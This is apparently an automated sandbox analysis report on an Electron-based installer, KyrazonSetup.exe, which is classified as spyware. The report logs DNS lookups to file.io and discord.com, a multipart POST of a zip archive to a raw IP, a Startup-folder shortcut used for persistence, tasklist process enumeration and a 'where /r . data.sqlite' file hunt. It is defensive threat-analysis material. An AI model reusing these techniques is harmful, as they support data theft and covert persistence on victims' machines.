Source: global trafficDNS traffic detected: DNS query: file.io
Source: global trafficDNS traffic detected: DNS query: zerostone.discloud.app
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /storage HTTP/1.1Accept: application/json, text/plain, */*Content-Type: multipart/form-data; boundary=--------------------------229700368627596606758153User-Agent: axios/1.7.2Content-Length: 2931Accept-Encoding: gzip, compress, deflate, brHost: 92.246.138.20Connection: closeData Ascii: ----------------------------229700368627596606758153Content-Disposition: form-data; name="file"; filename="8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip"Content-Type: application/zip
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com)
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/site/gaviotachessengine/Home/endgame-tablebases-1
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skia.org/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://source.corp.google.com/piper///depot/google3/third_party/tamachiyomi/README.md
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/
Source: KyrazonSetup.exe, 00000000.00000003.1868301732.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867607349.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867686588.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866823126.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868196976.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869169312.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867926612.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868835634.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867450366.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868578913.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870121124.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870648405.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 
00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866034713.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866565978.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: KyrazonSetup.exe, 00000000.00000003.1868301732.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867607349.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867686588.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866823126.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868196976.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869169312.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867926612.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868755608.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868835634.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867450366.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868578913.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869852826.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 
00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870121124.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870648405.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: KyrazonSetup.exe, 00000000.00000003.1866565978.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869?hl=es
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc9562.html
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc9562.html#name-example-of-a-uuidv7-value
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc9562.html#section-6.2-5.1
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/copyright.html.
Source: unknownNetwork traffic detected: HTTP traffic on port 49542 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49546
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49545
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49544
Source: unknownNetwork traffic detected: HTTP traffic on port 49540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49542
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49541
Source: unknownNetwork traffic detected: HTTP traffic on port 49544 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49540
Source: unknownNetwork traffic detected: HTTP traffic on port 49546 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49535 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49550 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49537
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49535
Source: unknownNetwork traffic detected: HTTP traffic on port 49541 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49545 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49552
Source: unknownNetwork traffic detected: HTTP traffic on port 49537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49551
Source: unknownNetwork traffic detected: HTTP traffic on port 49547 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49550
Source: unknownNetwork traffic detected: HTTP traffic on port 49551 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49548 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49549
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49548
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49547
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405205
Source: Conhost.exeProcess created: 51
Source: cmd.exeProcess created: 56

System Summary

Source: C:\Users\user\Desktop\KyrazonSetup.exeFile dump: KyrazonGodot.exe.0.dr 172671488
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile dump: KyrazonGodot.exe0.0.dr 172671488
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00404A440_2_00404A44
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00406F540_2_00406F54
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_0040677D0_2_0040677D
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeCode function: 12_2_0040100012_2_00401000
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeCode function: String function: 004029C7 appears 72 times
Source: libEGL.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: KyrazonGodot.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: KyrazonGodot.exe0.0.drStatic PE information: Number of sections : 15 > 10
Source: KyrazonSetup.exe, 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamensis7z.dll, vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1871787934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameShortcut.exe8 vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1864822801.0000000004FA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevk_swiftshader.dll, vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1815847751.0000000004FA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameelectron.exe2 vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1861082432.000000000078C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibEGL.dllb! vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1861726398.0000000004FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dllb! vs KyrazonSetup.exe
Source: KyrazonSetup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal60.spyw.winEXE@294/101@10/8
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004044D1
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,0_2_004020D1
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Users\user\Desktop\KyrazonSetup.exeMutant created: \Sessions\1\BaseNamedObjects\b3cf5a4f-183c-5906-ad23-5f1f95ad8d0e
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:600:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsoC2CC.tmp
Source: KyrazonSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KYRAZONGODOT.EXE'
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KYRAZONGODOT.EXE'
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\where.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KYRAZONGODOT.EXE'
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\KyrazonSetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Shortcut.exeString found in binary or memory: -help
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile read: C:\Users\user\Desktop\KyrazonSetup.exe
Source: unknownProcess created: C:\Users\user\Desktop\KyrazonSetup.exe "C:\Users\user\Desktop\KyrazonSetup.exe"
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "KyrazonGodot.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
